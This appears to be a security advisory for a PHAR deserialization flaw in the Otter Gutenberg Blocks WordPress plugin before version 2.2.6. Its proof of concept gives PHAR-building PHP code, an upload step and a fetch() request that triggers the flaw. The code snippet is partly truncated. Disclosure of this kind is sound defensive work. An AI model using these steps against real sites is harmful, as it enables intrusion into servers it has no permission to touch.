Otter - Gutenberg Blocks < 2.2.6 - Author+ PHAR Deserialization

The plugin does not sanitize some user-controlled file paths before performing file operations on them. This leads to a PHAR deserialization vulnerability on PHP < 8.0 using the phar:// stream wrapper.

PoC

Please note that the following proof-of-concept requires WordPress to be running a PHP version previous to 8.0. 1. Create a PHAR file using the following PHP code in the create_phar.php file, and the command php --define phar.readonly=0 create_phar.php. startBuffering(); $phar->addFromString(‘test.png’, ‘text’); $phar->setStub(“\xff\xd8\xff\n”); $phar->setMetadata(new Evil()); $phar->stopBuffering(); 2. As an Author user, upload the poc.phar.jpg file. Note its path on the server (e.g. /wp-content/uploads/2023/04/poc.phar_.jpg). 3. Create a simulated gadget on the server with the following code: class Evil { function _wakeup() { die(‘Arbitrary deserialization’); } } 4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server): fetch("/wp-json/otter/v1/dynamic?type=author&uid;=1234&context;=somecontext&fallback;=phar://wp-content/uploads/2023/04/poc.phar.jpg/test.txt")